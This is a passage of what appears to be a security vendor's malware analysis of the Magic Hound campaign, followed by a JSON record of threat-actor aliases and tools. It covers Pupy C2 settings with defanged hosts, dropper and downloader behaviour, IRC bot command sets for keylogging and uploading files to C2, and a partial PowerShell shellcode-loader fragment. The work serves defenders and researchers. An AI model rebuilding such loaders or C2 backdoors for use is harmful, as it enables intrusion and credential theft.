Configuration\r\n82779504d3fa0ffc8506ab69de9cb4d8f6415adbb11a9b8312828c539cf10190\r\nLAUNCHER_ARGS=['--host',\r\n'www1.chrome-up[.]date:4443', '-t',\r\n'obfs3']\r\ndb453b8de1a01a3e4d963847c0a0a45fb7e1a9b9e6d291c8883c74019f2fc91f\r\nLAUNCHER_ARGS=['--host',\r\n'www1.chrome-up[.]date:4443', '-t',\r\n'obfs3']\r\n7e57e35f8fce0efc3b944a7545736fa419e9888514fcd9e098c883b8d85e7e73\r\nLAUNCHER_ARGS=['--host',\r\n'139.59.46[.]154:3543', '-t', 'obfs3']\r\nThese configurations show that this group uses both fully-qualified domain names and IP addresses to host their Pupy C2\r\nservers. Also, the configurations show the use of the “obfs3” (The Threebfuscator) transport, which is an obfuscation\r\nmethod to hide the true TCP-based communications protocol. The “obfs3” is used in the Tor project and the specifics of this\r\ntransport can be found at the Tor Project.\r\nMAGICHOUND.DROPIT\r\nThe Magic Hound campaign was also discovered using a custom dropper tool, which we have named MagicHound.DropIt.\r\nThe DropIt Trojan we analyzed is an executable that builds an embedded executable by decoding embedded blobs of base64\r\nencoded data and concatenating them together in the correct order. In all of the DropIt samples we collected, the dropper\r\nwill then save the executable to the user’s %TEMP% folder and execute the file, specifically to one of the following\r\nfilenames:\r\n%TEMP%\\spp.exe\r\n%TEMP%\\sloo.exe\r\n%TEMP%\\spoo.exe\r\n%TEMP%\\vschos.exe\r\nWe have also seen Magic Hound using DropIt like a binder Trojan, specifically dropping a legitimate decoy executable\r\nalong with the malicious executable as a payload. For example, we analyzed a DropIt sample (SHA256:\r\ncca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671) that dropped two executables, one of which\r\nwas saved to “%TEMP%\\flash_update.exe” that was a legitimate Flash Player installer. We believe the Magic Hound\r\ncampaign uses the DropIt Trojan to run legitimate applications that fit their social engineering, which in the example above\r\nincluded coercing the victim into updating their Flash Player.\r\nMAGICHOUND.RETRIEVER\r\nWe observed a DropIt sample installing another Trojan we call MagicHound.Retriever. At a high level, Retriever is a .NET\r\ndownloader that downloads secondary payloads from servers associated with Magic Hound. While the Trojan itself does not\r\nresemble the other Magic Hound tools, it does create a folder named \"c:\\temp\" that the Magic Hound loader creates to store\r\nits persistence executable, as previously discussed. The folder name is quite generic and by itself is not a great correlation\r\npoint, however, this coupled with the shared infrastructure makes a higher fidelity connection between the two.\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 13 of 20\n\nThe Retriever Trojan uses the following namespace:\r\nusing pcchekapp.grp.ammar.samaneh;\r\nAndroid.The malware begins by creating a web service object and uses the following URL within its configuration:\r\nhttp:// service.chrome-up[.]date:8080 /WebService.asmx\r\nIt then calls a function called \"SetLog2\", which sets variables for the system's IP address, MAC address and hostname. A\r\npassword variable is available but unused in this sample. The code will gather some information about the system,\r\nspecifically the local IP address, MAC address, and the external IP address of the system. The code obtains the external IP\r\naddress via an HTTP request using to “http://checkip.dyndns.org/” and uses a regular expression to locate an IP address from\r\nthe HTTP response.\r\nOnce these variables are set, the malware uses the SoapHttpClientProtocol class to communicate with its C2 server, which\r\nissues an HTTP POST requests that appears as:\r\nAs you can see from the above request, the SoapHttpClientProtocol class neatly structures data into an HTTP POST request.\r\nAll subsequent interaction with the C2 server uses the same SOAP web service, so we will not show all of the generated\r\nHTTP requests. Instead, we will refer to the specific SOAP action (see \"SOAPAction\" field in previous example, specifically\r\n\"SetLog2\") that the Trojan requests from the C2 server and the response from the C2 server. After sending the C2 the system\r\ninformation, the malware then issues a second request for \"GetHasAnything\", which will communicate with the C2 server\r\nand ask the server if it has a secondary binary for the Trojan to install.\r\nIf the C2 server provides any response to the \"GetHasAnything\" request, it then calls the \"GetIdAbOne\" SOAP method to\r\nobtain what we believe is a unique identifier for the system that the Trojan will use for further interaction with the C2. After\r\nreceiving this variable, the Trojan calls the \"GetNameAbById\" to obtain a base64 string that will be the filename written in a\r\nnewly created \"c:\\temp\" (decoded from \"YzpcdGVtcFw=\") folder. The Trojan will then call \"GetAbById\",  which the C2\r\nwill provide a base64 string for the contents for the file to write to c:\\temp. After obtaining the unique ID from the C2 server,\r\nthe Trojan calls the \"SetAbStatById\" method to notify the C2 server of its status of \"1\" to notify the server it had\r\nsuccessfully received the filename and file data.\r\nWith the file written to the system, the Trojan calls the \"GetishideAbById\" SOAP action to determine whether or not the C2\r\nserver wishes to execute the newly dropped file in a hidden window. This request is followed by a call to\r\n\"GetisrunasAbById\" to determine if the Trojan should use \"runas\" to execute the downloaded executable with elevated\r\nprivileges, which would display the UAC dialog for the user to click.\r\nUnfortunately, we were unable to obtain a secondary payload from an active C2 server.\r\nMAGICHOUND.LEASH\r\nThe Magic Hound campaign was also discovered deploying an IRC Bot, which we have named MagicHound.Leash. This\r\ntool was discovered when we observed a DropIt sample installing a backdoor Trojan that used IRC for its C2\r\ncommunications. The bot chooses a random name from 977 hardcoded possibilities, connects to an adversary owned IRC\r\nserver and joins a channel using the following IRC commands:\r\nUSER AS_a # # :des\r\nNICK Conroy\r\nJOIN :#kalk\r\nLeash obtains its commands via private messages (PRIVMSG) sent from the adversary who must also be connected to the\r\nIRC server. The following commands are available:\r\nCommand SubCommand Description\r\nVER\r\nGenerates the following IRC client command that will be sent to the C2 server:\r\nPRIVMSG \u003cusername\u003e :    8 LED= 20160124\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 14 of 20\n\nKILL Trojan disconnects from the IRC server and terminates itself\r\nRESET Trojan disconnects from the IRC server and runs the executable again\r\nOS\r\nObtains the Windows version and responds to the C2 with the following message\r\n\"PRIVMSG \u003cusername\u003e :\u003cone of the following version strings\u003e\":\r\nWindows NT\r\nWindows 95\r\nWindows 98\r\nWindows ME\r\nWindows 2003\r\nWindows XP\r\nWindows 7\r\nWindows Vista\r\nUnkown os info\r\n!SH EXEC Not supported\r\nMD\r\nCreates a specified directory. The Trojan will respond to the C2 with \"PRIVMSG\r\n\u003cusername\u003e : \u003cmessage\u003e [\u003cspecified path\u003e]\". The message sent to the C2 will be \"dir\r\nis maked.\" if successful or \"dir is not maked\" if unsuccessful.\r\nMKDIR Same as MD subcommand.\r\nRD\r\nRemoves a specified directory. The Trojan will respond to the C2 with \"PRIVMSG\r\n\u003cusername\u003e : \u003cmessage\u003e [\u003cspecified path\u003e]\". The message sent to the C2 will be \"dir\r\nis removed.\" if successful or \"dir is not removed.\" if unsuccessful.\r\nDEL\r\nDeletes a specified file. The Trojan will respond to the C2 with \"PRIVMSG\r\n\u003cusername\u003e : \u003cmessage\u003e [\u003cspecified path\u003e]\". The message sent to the C2 will be \"file\r\nis deleted.\" if successful or \"file is not deleted.\" if unsuccessful.\r\nCOPY Not supported.\r\nMOVE Not supported.\r\nREN\r\nRenames a specified file. The Trojan will respond to the C2 with \"PRIVMSG\r\n\u003cusername\u003e : \u003cmessage\u003e [\u003cspecified path\u003e]\". The message sent to the C2 will be \"file\r\nis renamed.\" if successful or \"file is not renamed.\" if unsuccessful.\r\nDRIVE Lists the logical drives and the type, as well the total/free space of the fixed devices.\r\nEXE\r\nCalls GetModuleFileNameA function to obtain the path to the currently running\r\nexecutable and sends it to the C2 server.\r\n!DWN\r\nDownloads a file from a specified URL. Responds to the IRC server via PRIVMSG\r\nwith “Download  Success :FilePath=\u003cpath to downloaded file\u003e” or “Download Fail”\r\nif unsuccessful.\r\n!CMD\r\nTrojan executes a command prompt command. The Trojan will save the output of the\r\ncommand to %TEMP%\\win\u003crandom number\u003e.txt and send the contents to the C2\r\nserver or \"The length of Cmd result file is ziro!\" if the command was unsuccessful.\r\nSA\r\nGenerates the following IRC client command that will be sent to the C2 server:\r\nPRIVMSG \u003cusername\u003e : Hello ,my name is  \u003cIRC USER name\u003e, Im ready my\r\nComputer Name is:\u003ccomputer name\u003e\r\nAll of the commands, except for the VER command, must be issued by individuals in the IRC channel with nicknames that\r\nstart with \"AS_\" or \"AF_\". This suggests that the adversary’s IRC nickname would need to have these prefixes to control the\r\nsystems infected with this Trojan. The adversary could have used this name requirement as an added measure to make sure\r\nother individuals did not join the IRC server and begin interacting with compromised systems.\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 15 of 20\n\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 16 of 20\n\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 17 of 20\n\nMPKBot\r\nWe also found a second IRC bot called MPK (SHA256:\r\nd08d737fa59edbea4568100cf83cff7bf930087aaa640f1b4edf48eea4e07b19) using an IP that a Retriever sample was hosted\r\non as a C2 server instead. This MPK IRC bot is very similar to the MPK Trojan that used a custom C2 communications\r\nprotocol, as discussed in the whitepaper by CheckPoint discussing a threat group called Rocket Kitten. We believe this\r\nversion of the MPK Trojan is based on the same code base, as both the IRC version and the one discussed in the above white\r\npaper have considerable similarities from a behavior standpoint and both Trojan have direct code sharing between them.\r\nFrom a behaviorial standpoint, both the IRC and custom protocol version of MPK save \"tmp.vbs\" and \"tmp1.vbs\" to the\r\n%TEMP% folder (both differed slightly but used the same variable names within the script) in order to copy the Trojan to its\r\nfinal location and to execute it. Both variants need to be executed with the command line argument \"[2]\" to avoid\r\ncontinually attempting to copy and execute the Trojan using the “tmp.vbs” and “tmp1.vbs” files. The two variants of MPK\r\nshare the same registry key that the Trojan uses to automatically run each time the system starts, specifically:\r\n[HKLM and HKCU]\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\explorer\r\nBoth MPK variants include key loggers that are extremely similar in functionality in addition to having the same strings\r\nused for headers within the key log file. The MPK IRC Bot monitors active application windows and writes the title of the\r\nopen window along with the logged keystrokes to a file at “%temp%\\Save.tmp”. The MPK Trojan also monitors specifically\r\nfor windows that are likely to contain login forms for popular web-based email clients, such as titles that contain:\r\n\"Gmail -\"\r\n\"Yahoo - login\"\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 18 of 20\n\n\"Sign In -\"\r\n“Outlook.com -\"\r\nMPK will attempt to parse these window titles to identify the associated email address and record these to the log file using\r\nthe following format:\r\n/////////////\r\nMail Find \u003cemail address\u003e\r\n///////////\r\nIf the Trojan does not find the window titles associated with Gmail, Yahoo or Outlook, it saves the title to the \"Save.tmp\"\r\nfile in the following format:\r\n+++++++++++++\r\nWindow= \u003cwindow title\u003e\r\n+++++++++++++\r\nThe major difference between the IRC variant and non-IRC variant of MPK is the C2 protocol used. The IRC variant creates\r\na mutex named “mpk1” and attempts to connect to an IRC server at 45.58.37[.]142:6667. The MPK bot generates a random\r\nlowercase name and uses it to log into the IRC server. It then sends the following IRC commands:\r\nNICK bxphzrjbxp\r\nUSER bxphzrjbxp bxphzrjbxp bxphzrjbxp bxphzrjbxp\r\nTo make sure it connected to the correct server, the Trojan checks for the message sent from the IRC server after the bot\r\nconnects:\r\nWelcome to the MpkNet IRC Network\r\nThe MPK bot does not join a specific IRC channel, instead sending private messages (PRIVMSG) to a user with the nick\r\n\"mpk\". After connecting to the IRC server, the MPK bot sends custom ping messages and provides an introduction via a\r\n“!Hello” message that contains the current logged in user of the infected host, if the user has administrator privileges, the\r\nhostname, the UUID of the system, and operating system version. Figure 7 shows the initial private messages sent from the\r\nMPK bot to the “mpk” account on the C2 server.\r\nFigure 7 Initial private messages sent from MPK to the IRC C2 server\r\nThe commands available within the MPK IRC bot are called via a jump table, rather than a switch statement used in the\r\ncustom protocol variant of MPK. The IRC variant of MPK has a command set (Table 2) that makes this an effective\r\nbackdoor Trojan, specifically allowing the actors to steal credentials from the targeted system via keylogging, to navigate\r\nand interact with the file system, to run arbitrary commands, and to download and execute additional tools on the system.\r\nCommand Description\r\n!Dir Lists the contents of a specified directory\r\n!Drives Enumerates the storage drives attached to the system and their respective type.\r\n!DeleteFile Deletes a specified file\r\n!NickChange\r\nChanges the nickname that the Trojan uses to log into the C2 IRC server. Writes it to\r\n\"nick435.tmp\" for subsequent logins.\r\n!ProcessList List running processes, including their PID, parent PID, executable name and priority\r\n!SendFileToServer Uploads a specified file to the C2 server\r\n!CaptureScreen Takes a screenshot that it saves to a file and uploads to the C2 server.\r\n!Hello\r\nThe Trojan introduces itself by sending the current username, if its an admin account or not,\r\nthe computer name, the system UUID and the OS version.\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 19 of 20\n\n!ProcessKill Terminates a process based on PID\r\n!RenameFileFolder Renames a file or folder and returns a list of the containing folder to the C2 server.\r\n!GetFileOfServer Writes a file from the C2 server to a specified file\r\n!ExecuteCommand\r\nUses the command prompt sub-process to execute commands and returns their results to the\r\nC2.\r\n!ExeCuteFile Executes a specified file using ShellExecuteA\r\n!DeleteFileFolder Deletes a file or a folder\r\n!SendkeyLogToServer Uploads the %TEMP%\\Save.tmp file to the C2 server\r\n!DeleteKeyloggerLog Deletes the %TEMP%\\Save.tmp file on the system\r\nTable 2 Commands available within MPK IRC Bot\r\nSource: https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/\r\nPage 20 of 20\n\n\u0026lt;shellcode REDACTED $z.Length};$rJr=$w::VirtualAlloc(0,0x1000,$g,0x40);for for brevity\u0026gt;;$g = 0x1000;if ($z.Length -gt 0x1000){$g ($i=0;$i -le ($z.Length-1);$i++) = {$w::memset([IntPtr]\n($rJr.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$rJr,0,0,0);for (;;){Start-sleep 60};';$e =\n[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($0o8e));$DKn = \"-enc\n Page 12 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "MISPGALAXY", "ETDA", "Malpedia" ], "references": [ "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" ], "report_names": [ "unit42-magic-hound-campaign-attacks-saudi-targets" ], "threat_actors": [ { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8e1bae2f-2a21-4ba8-a6f1-42155f96aec8", "created_at": "2022-10-25T16:07:23.645758Z", "updated_at": "2026-04-10T02:00:04.700158Z", "deleted_at": null, "main_name": "Flying Kitten", "aliases": [ "Ajax Security Team", "Flying Kitten", "G0130", "Group 26", "Operation Saffron Rose" ], "source_name": "ETDA:Flying Kitten", "tools": [ "Stealer" ], "source_id": "ETDA", "reports": null }, { "id": "029625d2-9734-44f9-9e10-b894b4f57f08", "created_at": "2023-01-06T13:46:38.364105Z", "updated_at": "2026-04-10T02:00:02.944092Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "iKittens", "Group 83", "NewsBeef", "G0058", "CharmingCypress", "Mint Sandstorm", "Parastoo" ], "source_name": "MISPGALAXY:Charming Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3676dfe-3d40-4b3a-bfbd-4fc1f8c896f4", "created_at": "2022-10-25T15:50:23.808974Z", "updated_at": "2026-04-10T02:00:05.291959Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "Magic Hound", "TA453", "COBALT ILLUSION", "Charming Kitten", "ITG18", "Phosphorus", "APT35", "Mint Sandstorm" ], "source_name": "MITRE:Magic Hound", "tools": [ "Impacket", "CharmPower", "FRP", "Mimikatz", "Systeminfo", "ipconfig", "netsh", "PowerLess", "Pupy", "DownPaper", "PsExec" ], "source_id": "MITRE", "reports": null }, { "id": "99c7aace-96b1-445b-87e7-d8bdd01d5e03", "created_at": "2025-08-07T02:03:24.746965Z", "updated_at": "2026-04-10T02:00:03.640335Z", "deleted_at": null, "main_name": "COBALT ILLUSION", "aliases": [ "APT35 ", "APT42 ", "Agent Serpens Palo Alto", "Charming Kitten ", "CharmingCypress ", "Educated Manticore Checkpoint", "ITG18 ", "Magic Hound ", "Mint Sandstorm sub-group ", "NewsBeef ", "Newscaster ", "PHOSPHORUS sub-group ", "TA453 ", "UNC788 ", "Yellow Garuda " ], "source_name": "Secureworks:COBALT ILLUSION", "tools": [ "Browser Exploitation Framework (BeEF)", "MagicHound Toolset", "PupyRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "f4d7cba1-dbdd-42a9-88c5-4d0c81659ee0", "created_at": "2023-01-06T13:46:38.357581Z", "updated_at": "2026-04-10T02:00:02.941254Z", "deleted_at": null, "main_name": "Flying Kitten", "aliases": [ "Saffron Rose", "AjaxSecurityTeam", "Ajax Security Team", "Group 26", "Sayad", "SaffronRose" ], "source_name": "MISPGALAXY:Flying Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b0261705-df2e-4156-9839-16314250f88a", "created_at": "2023-01-06T13:46:38.373617Z", "updated_at": "2026-04-10T02:00:02.947842Z", "deleted_at": null, "main_name": "Rocket Kitten", "aliases": [ "Operation Woolen-Goldfish", "Thamar Reservoir", "Timberworm", "TEMP.Beanie", "Operation Woolen Goldfish" ], "source_name": "MISPGALAXY:Rocket Kitten", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "1699fb41-b83f-42ff-a6ec-984ae4a1031f", "created_at": "2022-10-25T16:07:23.83826Z", "updated_at": "2026-04-10T02:00:04.761303Z", "deleted_at": null, "main_name": "Magic Hound", "aliases": [ "APT 35", "Agent Serpens", "Ballistic Bobcat", "Charming Kitten", "CharmingCypress", "Cobalt Illusion", "Cobalt Mirage", "Educated Manticore", "G0058", "G0059", "Magic Hound", "Mint Sandstorm", "Operation BadBlood", "Operation Sponsoring Access", "Operation SpoofedScholars", "Operation Thamar Reservoir", "Phosphorus", "TA453", "TEMP.Beanie", "Tarh Andishan", "Timberworm", "TunnelVision", "UNC788", "Yellow Garuda" ], "source_name": "ETDA:Magic Hound", "tools": [ "7-Zip", "AnvilEcho", "BASICSTAR", "CORRUPT KITTEN", "CWoolger", "CharmPower", "ChromeHistoryView", "CommandCam", "DistTrack", "DownPaper", "FRP", "Fast Reverse Proxy", "FireMalv", "Ghambar", "GoProxy", "GorjolEcho", "HYPERSCRAPE", "Havij", "MPK", "MPKBot", "Matryoshka", "Matryoshka RAT", "MediaPl", "Mimikatz", "MischiefTut", "NETWoolger", "NOKNOK", "PINEFLOWER", "POWERSTAR", "PowerLess Backdoor", "PsList", "Pupy", "PupyRAT", "SNAILPROXY", "Shamoon", "TDTESS", "WinRAR", "WoolenLogger", "Woolger", "pupy", "sqlmap" ], "source_id": "ETDA", "reports": null }, { "id": "e034b94b-9655-42c4-a72e-a58807dce299", "created_at": "2022-10-25T16:07:24.133537Z", "updated_at": "2026-04-10T02:00:04.876832Z", "deleted_at": null, "main_name": "Rocket Kitten", "aliases": [ "Group 83", "NewsBeef", "Newscaster", "Operation Newscaster", "Operation Woolen-GoldFish", "Parastoo", "Rocket Kitten" ], "source_name": "ETDA:Rocket Kitten", "tools": [ "CoreImpact (Modified)", "FireMalv", "Ghole", "Gholee" ], "source_id": "ETDA", "reports": null }, { "id": "8faa11f5-2a14-479c-9ea8-3779e6de9749", "created_at": "2022-10-25T15:50:23.814205Z", "updated_at": "2026-04-10T02:00:05.308465Z", "deleted_at": null, "main_name": "Ajax Security Team", "aliases": [ "Ajax Security Team", "Operation Woolen-Goldfish", "AjaxTM", "Rocket Kitten", "Flying Kitten", "Operation Saffron Rose" ], "source_name": "MITRE:Ajax Security Team", "tools": [ "sqlmap", "Havij" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434606, "ts_updated_at": 1775792275, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/62318114dc658c48a61870c4062fd75a860f4f62.pdf", "text": "https://archive.orkl.eu/62318114dc658c48a61870c4062fd75a860f4f62.txt", "img": "https://archive.orkl.eu/62318114dc658c48a61870c4062fd75a860f4f62.jpg" } }